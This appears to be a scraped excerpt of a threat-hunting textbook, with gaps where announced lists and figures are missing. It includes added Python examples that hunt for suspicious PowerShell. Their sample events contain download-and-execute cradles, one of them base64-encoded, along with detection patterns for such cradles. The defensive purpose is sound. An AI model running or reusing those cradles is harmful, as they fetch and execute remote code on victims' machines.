Full Ebook of Cyber Threat Hunting Meap V05 Nadhem Alfardan Online PDF All Chapter
Nadhem Alfardan
Cyber Threat Hunting MEAP V05
1. Copyright 2023 Manning Publications
2. Welcome
3. 1 Introduction to Threat Hunting
4. 2 Building the Foundation of a Threat Hunting Practice
5. 3 Your First Threat Hunting Expedition
6. 4 Threat Intelligence for Threat Hunting
7. 5 Hunting in Clouds
8. 6 Using Fundamental Statistical Constructs
9. 7 Tuning Statistical Logic
10. 8 Unsupervised Machine Learning with K-Means
MEAP Edition Manning Early Access Program Cyber Threat Hunting
Version 5
Throughout the book, we cover various data sources, data sets, and
techniques for designing and conducting threat hunts. We show how hunters can
use standard searches, statistics, and machine learning as analytic techniques
to conduct threat hunt expeditions.
I first take you through the fundamentals of threat hunting, how to build a
practical threat hunting framework, and how to establish a maturity roadmap for
your threat hunting program.
I then take you through the process of conducting threat hunt expeditions
using a scenario-based approach, covering different real-life topics and
scenarios. You will get the opportunity to learn and practice threat hunting
using different data sets and techniques. You will gain access to templates
and processes that I hope will be of value to your career and inspiration as a
threat hunter.
To get the best out of the book, you need to have basic knowledge and
experience in managing security controls, networking concepts, operating
systems, and performing searches in data stores.
Please let me know your thoughts in the liveBook discussion forum on what I
wrote so far and what you would like to see in the rest of the book.
Thanks again for your interest and for purchasing the MEAP. Good luck,
hunters!
Nadhem Al Fardan
Let us start with an overview of the cybersecurity threat landscape and show
why threat hunting is essential.
1.1 Cybersecurity Threat Landscape
Today's cyber threat landscape is complex, diverse, and constantly evolving.
Threat actors, ranging from organized cybercrime to state-sponsored groups,
actively improve existing attack techniques and tools and create new ones so
that they can reliably establish a foothold and move quickly through the Cyber
Kill Chain (https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html),
from reconnaissance to actions on objectives.
The Cyber Kill Chain, developed by Lockheed Martin and shown in Figure 1.1,
describes the stages that adversaries typically go through to achieve their
final objective(s). It consists of seven stages: reconnaissance, weaponization,
delivery, exploitation, installation, command and control, and actions on
objectives.
We now have some idea about the complexity of the security threat
landscape; let us dig into essential concepts of threat hunting and describe its
relevance and importance.
Advanced adversaries have shifted from noisy attacks that trigger security
alarms to stealthier ones that leave a small footprint, trigger minimal alerts,
if any, and go unnoticed by automated detection tools.
According to a SANS-published report (https://www.sans.org/webcasts/stop-nasty-malware-pre-post-execution-review-ensilo-endpoint-security-platform-106690),
"the evolution of threats such as file-less malware, ransomware, zero days and
advanced malware, combined with security tools getting bypassed, poses an
existential risk to enterprises."
Organizations rely on the threat hunter's skills to uncover such threats
during threat hunt expeditions, which reduces dwell time and increases cyber
resilience. Dwell time is the interval between an attacker's initial
penetration of the environment (the time of the threat's first successful
execution) and the point at which the organization discovers the attacker
(the threat detection time).
Now that we have established the need for a proactive approach to uncovering
cyber security threats, let us describe how to structure a threat hunt.
Hypothesis
Now that we understand what a hypothesis is, let us discuss how to come up
with one.
The threat landscape of the environment you are trying to protect should
drive which hypotheses you create and execute. Different sources of
information about threats, and about their relevance to the environment, can
help you understand that landscape; threat hunters then translate this
understanding into hypotheses. The following are examples of such sources:
It is the job of the threat hunter to test the hypothesis using the best
resources at the hunter's disposal. Testing the hypothesis can start by defining
a manageable list of activities that can uncover the first set of evidence or
indicators concerning the hypothesis, or that guide the hunter to subsequent
searches. For example, the following activities are relevant to the previously
stated hypothesis.
Hunting for suspicious PowerShell activity could reveal the compromise and so
prove the hypothesis. Successful execution of the following may uncover
evidence of compromise:
1. Hypothesis proven: the analysis of the data collected during the hunt
expedition confirms the hypothesis. In this case, the hunt expedition has
uncovered a security incident.
2. Hypothesis disproven: the analysis of the data collected during the hunt
expedition refutes the hypothesis. In this case, the hunt expedition did not
uncover a security incident.
3. Inconclusive: there is still insufficient information to either prove or
disprove the hypothesis. This outcome can have various causes, such as
insufficient data, inappropriate tools, and scope limitations.
Failing to prove the hypothesis does not necessarily mean that the threat does
not exist. It means that the hunter could not uncover the threat with the
skills, data, and tools available.
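The hypothesis test and its three outcomes are easier to see in code. The following is an added example, not code from the book: it hunts for suspicious PowerShell activity (encoded commands and download cradles) over a handful of constructed Windows process-creation (4688) and PowerShell script-block (4104) records, and classifies the result as proven, disproven, or inconclusive. The indicator patterns, host names, event shapes, and function names are assumptions made for the example; the key point is that a hunt with a missing data source is reported as inconclusive rather than disproven.

```python
import base64
import re
from dataclasses import dataclass, field

# Indicator patterns used by this example hunt (hypothetical; tune them to the
# environment before using them in a real expedition).
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
EVASION_RE = re.compile(
    r"(?i)(?:^|\s)-(?:nop|noprofile|noni|noninteractive|w(?:indowstyle)?\s+hidden"
    r"|ep\s+bypass|executionpolicy\s+bypass)\b")
CRADLE_RE = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b"
    r"|invoke-expression|frombase64string")


def _encode_command(script: str) -> str:
    """PowerShell -EncodedCommand is base64 over UTF-16LE; used here only to build sample data."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry (not real logs): 4688 process-creation and 4104
# script-block records, reduced to the fields the hunt needs.
SAMPLE_EVENTS = [
    {"host": "dc01", "event_id": 4688, "user": "CORP\\svc_backup",
     "command_line": "powershell.exe -nop -w hidden -enc " + _encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')")},
    {"host": "ws07", "event_id": 4104, "user": "CORP\\jdoe",
     "script_block": "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://10.0.0.5/b')"},
    {"host": "ws08", "event_id": 4688, "user": "CORP\\jdoe",
     "command_line": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"host": "ws09", "event_id": 4688, "user": "CORP\\ops",
     "command_line": "powershell.exe -File C:\\ops\\patch.ps1"},
    {"host": "ws09", "event_id": 4104, "user": "CORP\\ops",
     "script_block": "Get-ADUser -Filter * | Select-Object Name"},
]


@dataclass
class Finding:
    host: str
    event_id: int
    indicator: str
    detail: str
    flags: list = field(default_factory=list)


@dataclass
class HuntResult:
    outcome: str            # "proven", "disproven" or "inconclusive"
    findings: list
    missing_sources: list   # event IDs the hunt needed but did not see from in-scope hosts


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> list:
    """Apply the indicator logic to one event; an empty list means nothing suspicious."""
    findings, host, eid = [], event["host"], event["event_id"]
    if eid == 4688:
        cmd = event["command_line"]
        flags = [f.strip() for f in EVASION_RE.findall(cmd)]
        decoded = decode_encoded_command(cmd)
        if decoded is not None and CRADLE_RE.search(decoded):
            findings.append(Finding(host, eid, "encoded download cradle", decoded, flags))
        elif CRADLE_RE.search(cmd):
            findings.append(Finding(host, eid, "plaintext download cradle", cmd, flags))
    elif eid == 4104:
        block = event["script_block"]
        if CRADLE_RE.search(block):
            findings.append(Finding(host, eid, "download cradle in script block", block))
    return findings


def evaluate_hypothesis(events, in_scope_hosts, required_sources=(4688, 4104)) -> HuntResult:
    """Test the hypothesis against events from in-scope hosts and classify the outcome."""
    scoped = [e for e in events if e["host"] in in_scope_hosts]
    seen = {e["event_id"] for e in scoped}
    missing = [src for src in required_sources if src not in seen]
    findings = [f for e in scoped for f in analyze_event(e)]
    if findings:
        outcome = "proven"        # evidence found: widen scope, engage incident response
    elif missing:
        outcome = "inconclusive"  # a required data source is absent; no evidence proves nothing
    else:
        outcome = "disproven"     # full coverage and no indicators for this hypothesis
    return HuntResult(outcome, findings, missing)


if __name__ == "__main__":
    result = evaluate_hypothesis(SAMPLE_EVENTS, {"dc01", "ws07", "ws08", "ws09"})
    print(result.outcome)
    for f in result.findings:
        print(f"{f.host} {f.event_id} {f.indicator}: {f.detail} {f.flags}")
```

Run against all four hosts the hunt is proven by the encoded cradle on dc01 and the script block on ws07; restricted to ws08, which reports no 4104 events, it is inconclusive, and restricted to ws09 it is disproven. Decoding the encoded command before matching matters: the base64 blob itself contains none of the indicator strings.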
The book focuses on structured threat hunting, in which the threat hunter
works with other security team members to define and test a hypothesis
targeting adversaries' Tactics, Techniques, and Procedures (TTPs).
The organization's threat hunting maturity level should improve over time.
There are many lessons the hunter will learn from the hunt expeditions. The
book provides practical lessons on how to plan, build and operate an effective
threat hunting program.
Now that we have a good idea of what threat hunting is, let us compare it with
threat detection, a fundamental security monitoring service, and draw out the
differences and similarities.
SOC analysts attend to security alerts detected and reported by security tools
and perform triage and investigation of security incidents. Figure 1.2 shows
the threat detection process at a high level; in it, SOC analysts primarily
perform cyber threat farming. Like farmers, SOC analysts generally wait for
alerts (ripe crops) to show up on a dashboard, then triage and respond to them
(harvest and process). Hunting, on the other hand, takes a proactive approach.
Hunters take the lead by going out into the hunting field to conduct
expeditions, equipped with the right mindset, experience, situational
awareness, and the set of tools they require for the expedition.
Detection and hunting can use the same or different analytic techniques to
detect or hunt for malicious activity. For example, user behavior analytics
tools apply statistical analysis and machine learning to detect and report
anomalous user behavior to the security monitoring team. Hunters can make use
of similar techniques for cyber threat hunting. Although hunters would not
lead the development of machine learning models, they must understand the
capabilities and limitations of the different analytic techniques.
Threat hunters are highly skilled resources. Let us look at the set of skills
that threat hunters possess.
Successful threat hunters are curious, prepared to tackle new challenges, and
equipped with a good understanding of their hunting field. As a threat hunter,
you will face challenges such as unavailable data, slow searches, improper
event parsing, old technologies, and incomplete or missing access to systems.
The hunter should raise these challenges during and after a hunt expedition.
Some of them might be addressed in a reasonable time, while others might take
a long time or might not be addressed at all, especially ones that require
financial investment. These challenges should not stop hunters from finding
new ways to make their hunts more effective, by looking at other data and
systems and by tuning the techniques they deploy. Hunters are resourceful.
During a hunt expedition, not being able to prove the hypothesis should not
discourage a hunter. It is a common outcome that can have various causes,
including:
- The attack or threat described in the hypothesis does not exist in the
first place.
- The hunter might not yet have the full context of the environment. For
example, running a threat hunt against a newly deployed set of systems and
applications can prove challenging.
- The hunter might not yet have the skill set required to uncover
sophisticated attacks against technologies the hunter is not very familiar
with. For example, running a threat hunt expedition against a private
Kubernetes environment while unfamiliar with containerized deployments.
- Lack of the data the hunter needs to investigate further.
- The use of inappropriate techniques to uncover sophisticated attacks. For
example, running basic searches to uncover advanced persistent threats (APTs)
has its limitations.
Figure 1.3 shows the threat hunting process at a high level. It starts by
formalizing a hypothesis, followed by trying to prove it. If the hunter cannot
prove the hypothesis, the hunter refines it by updating its details and
searches for the threat again. If it is proven, the threat has been uncovered.
The hunter does not stop there: the scope is expanded and indicators are
searched for on other systems to understand the attack's magnitude and
spread. The hunter then engages the incident response team, and documents and
shares new content that would be helpful to the security monitoring and threat
intelligence teams.
Note
Now that we understand the threat hunting process, let us examine the tools
used to execute the "look for threat in the environment" step.
Core technologies and tools that hunters would have in their toolset
Depending on the environment and the scope of the hunt, the hunter's toolset
would contain other tools. For example, a hunter might use YARA rules to
search for and capture suspicious files and activity on endpoints, or push
Snort rules to network security tools such as intrusion detection systems to
capture network activity of interest.
1.8 Summary
Structured threat hunting is a hypothesis-driven practice that proactively
tries to uncover threats that were not detected, or that were detected but
dismissed or underestimated by analysts. Understanding the mindset of a threat
hunter and the threat hunting process is crucial to becoming a successful
threat hunter.
2 Building the Foundation of a
Threat Hunting Practice
This chapter covers
How to develop a threat hunting hypothesis
How to document a threat hunt play
The importance of threat intelligence to threat hunting
Building a threat hunting framework
The threat hunting process in detail
Threat hunting roles and responsibilities
Important frameworks and standards
How to evaluate the maturity of a threat hunting practice
We then describe how to start a hunting practice and improve its maturity
over time, supplying you with processes and templates to kickstart the work.
We then describe the general role and responsibilities of the threat hunter
using a responsible, accountable, consulted, and informed model.
Finally, we describe data sources and their importance to threat hunting and
provide an overview of common data sources and sets such as Windows
events, Sysmon, Linux events, network flows and firewall events.
Let us start by defining essential concepts and roles that we would refer to in
this chapter and the rest of the book.
2.1 Threat Hunting Definitions
Threat hunting is a human-centric security practice that takes a proactive
approach to uncovering threats that evaded detection tools, such as
automated, rule- and signature-based security systems, or threats that were
detected but dismissed or underestimated by analysts.
A hypothesis is a proposition that is consistent with known data but has
been neither verified nor shown to be false.
A threat hunter is a role taken by a cyber security specialist who
proactively and interactively seeks to uncover attacks or threats that
evaded the detection technologies deployed in various places in the
network.
Situational awareness refers to understanding the business, the supporting
technology environment, and the internal and external cyber threats
associated with this environment.
A threat actor is a person, group, or organization driven by various
motives to carry out malicious activity.
Now that we have defined some essential threat hunting-related concepts and
roles, let us construct our first hunt play.
Imagine the threat intelligence team sharing with you that a threat group
referred to as APT41 is now a top actor in their threat watchlist. Construct a
threat hunt play to uncover this group’s activities when using shell-based
techniques against Microsoft Active Directory (AD).
Note
This scenario considers a known threat actor that the threat intelligence team
considers relevant to the environment. There will be other cases in which the
actors and campaign are unknown, and you would rely on your experience,
data, and tools to uncover them. It takes time to build maturity, so let us start
with this scenario.
We need to create a threat hunt play, such as the example that follows
shortly. The threat hunt play documents the following: a title, a reference
number, background about the organization and the hunt play, the hypothesis
we are trying to test, the scope of the hunt, the techniques we start with to
trigger the hunt along with the associated procedures and data sources, and
internal and external references relevant to the hunt play. Let us look at
the example.
Over time, some threat hunts might transition to security detection rules. In
addition, there will also be cases in which some hunts might become
obsolete, for example, after decommissioning an application or a system.
The following is a format that you can use to document a threat hunting play.
The format consists of the following:
In our scenario, the threat intelligence team provided the threat hunter with a
good reason to establish one or more threat hunt plays relevant to a threat
group of interest, APT41, one of many active threat actors.
"Who would attack the organization, and how?" are the questions that threat
intelligence analysts try to answer. To do so, they research, analyze, and
compile a wide range of internal and external information to identify short-
term (present) and long-term (future) attacks and threats. Threat intelligence
analysts then share the compiled intelligence with the broader organization,
including threat hunters.
2.3.1 Threat Intelligence Types
Let us now look at how to view and process tactical and technical threat
intelligence, based on its level of complexity, through the lens of David
Bianco's Pyramid of Pain model.
A mature threat hunting practice would focus on the top three layers of the
Pyramid of Pain (network/host artifacts, tools, and TTPs) to get the best
value out of threat intelligence and to reach higher levels of maturity. The
bottom three layers of the pyramid (hash values, IP addresses, and domain
names) are associated with IOCs that are mainly consumed for security
monitoring purposes. Threat hunters still use these IOCs, but they should not
be the focus of the threat hunting practice as a whole.
We all exhibit, and will continue to exhibit, one form or another of cognitive
bias. Security professionals such as threat hunters should be aware of how
cognitive biases affect their decisions and judgment. There is a long list of
cognitive biases; the following are three critical ones that threat hunters
should watch for and try to overcome when designing and conducting hunts.
The threat intelligence community tracks threat actors and, in many cases,
maps their activities to the MITRE ATT&CK tactics and techniques.
Organizations and threat hunters can use this information to plan their hunts.
For example, APT41 (Mandiant - https://www.mandiant.com/resources/apt-
groups) is a group that is also known as Wicked Panda (CrowdStrike -
https://adversary.crowdstrike.com/en-US/adversary/wicked-panda), Group 72
(Cisco Talos - https://blogs.cisco.com/security/talos/threat-spotlight-group-
72) and BRONZE ATLAS (SecureWorks -
https://www.secureworks.com/research/threat-profiles/bronze-atlas.)
Threat hunters can use the MITRE ATT&CK as a starting point to investigate
the group, understanding and visualizing the known techniques and
procedures that the group deploys.
Note
If APT41 is identified as one of the threat actors of interest, the security
monitoring and threat hunting teams would look for the tactics, techniques,
and tools commonly used by the group. Threat hunters, in particular, would
establish hypotheses around the existence of traces of APT41 activity in the
network and search for the group's tactics and tools to prove them.
Including all of APT41's techniques in a single hunt play would not be
practical. Some techniques are not relevant to the environment, while others
are. You might end up grouping the applicable techniques by the tactic they
fall under and the procedures used. In our threat hunt play example, we are
looking at techniques in which PowerShell is used to execute the threat.
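To show how the hunt play fields listed earlier (title, reference number, background, hypothesis, scope, techniques, procedures, data sources, references) and this technique-selection step fit together, the following added example builds a play for the APT41/PowerShell scenario. It is not the book's template or code. The technique mapping for the group is a constructed, illustrative list, not the authoritative MITRE ATT&CK group entry (which the hunter should consult directly); the field names, the selection rule (platform present in the environment and procedure mentioning the keyword) and the validation function are assumptions made for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Technique:
    technique_id: str
    name: str
    tactic: str
    platforms: tuple
    procedure: str  # how the group has been observed using it (constructed text)


# Constructed, illustrative mapping for the group in the scenario. It is NOT the
# authoritative MITRE ATT&CK entry for APT41; consult ATT&CK for the real list.
GROUP_TECHNIQUES = {
    "APT41": [
        Technique("T1059.001", "Command and Scripting Interpreter: PowerShell",
                  "Execution", ("Windows",),
                  "PowerShell used to download and run additional payloads"),
        Technique("T1003.001", "OS Credential Dumping: LSASS Memory",
                  "Credential Access", ("Windows",),
                  "Credential dumping via a PowerShell-based Mimikatz variant"),
        Technique("T1021.004", "Remote Services: SSH",
                  "Lateral Movement", ("Linux",),
                  "SSH used to move between Linux hosts"),
        Technique("T1047", "Windows Management Instrumentation",
                  "Execution", ("Windows",),
                  "WMI used to execute commands on remote hosts"),
    ]
}

# The fields the page says a hunt play documents; every one must be non-empty.
REQUIRED_FIELDS = ("title", "reference", "background", "hypothesis", "scope",
                   "techniques", "procedures", "data_sources", "references")


def select_techniques(group: str, environment_platforms, keyword: str) -> list:
    """Keep techniques that apply to a platform present in the environment and
    whose observed procedure mentions the keyword (here: PowerShell)."""
    env = {p.lower() for p in environment_platforms}
    return [t for t in GROUP_TECHNIQUES.get(group, [])
            if {p.lower() for p in t.platforms} & env
            and keyword.lower() in t.procedure.lower()]


def build_hunt_play(reference, group, environment_platforms, keyword, scope, data_sources):
    """Assemble a hunt play dict from the group's applicable techniques."""
    techniques = select_techniques(group, environment_platforms, keyword)
    return {
        "title": f"{group} {keyword}-based activity against Active Directory",
        "reference": reference,
        "background": f"Threat intelligence lists {group} as a top actor in the watchlist.",
        "hypothesis": f"{group} has used {keyword} on in-scope AD systems and left traces in logs.",
        "scope": list(scope),
        "techniques": [t.technique_id for t in techniques],
        "procedures": [t.procedure for t in techniques],
        "data_sources": list(data_sources),
        "references": [f"ATT&CK {t.technique_id} ({t.tactic})" for t in techniques],
    }


def validate_play(play: dict) -> list:
    """Return the required fields that are missing or empty; an empty list means the play is complete."""
    return [f for f in REQUIRED_FIELDS if not play.get(f)]


if __name__ == "__main__":
    play = build_hunt_play("TH-0001", "APT41", ("Windows",), "PowerShell",
                           ["AD domain controllers", "admin workstations"],
                           ["Windows Security 4688", "PowerShell 4104"])
    for key in REQUIRED_FIELDS:
        print(f"{key}: {play[key]}")
    print("missing:", validate_play(play))
```

For a Windows environment the play picks up the two PowerShell-related techniques and validates cleanly; for a Linux-only environment the same call yields no applicable techniques, and `validate_play` flags the empty `techniques`, `procedures` and `references` fields, which is the signal that the play should not be run as written.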
Building and operating a structured threat hunt practice involves more than
creating hunting plays. A framework that describes how to manage a hunting
practice is needed. Let us look into the topic of building a framework for
threat hunting.
2.7 Frameworks
In general, a framework is a structure that outlines the organization of a
system (in our case, the threat hunting practice) and facilitates the proper
arrangement of the components that the framework identifies.
2.7.1 Scenario
Imagine you are asked to develop the outline of a threat hunting framework
to drive a structured threat hunting practice. What areas would the framework
cover, and what level of detail would you include?
Note
The threat hunting process can be much more involved, especially in the
execution phase when multiple hunters are involved in conducting and
supporting large-scale threat hunting expeditions.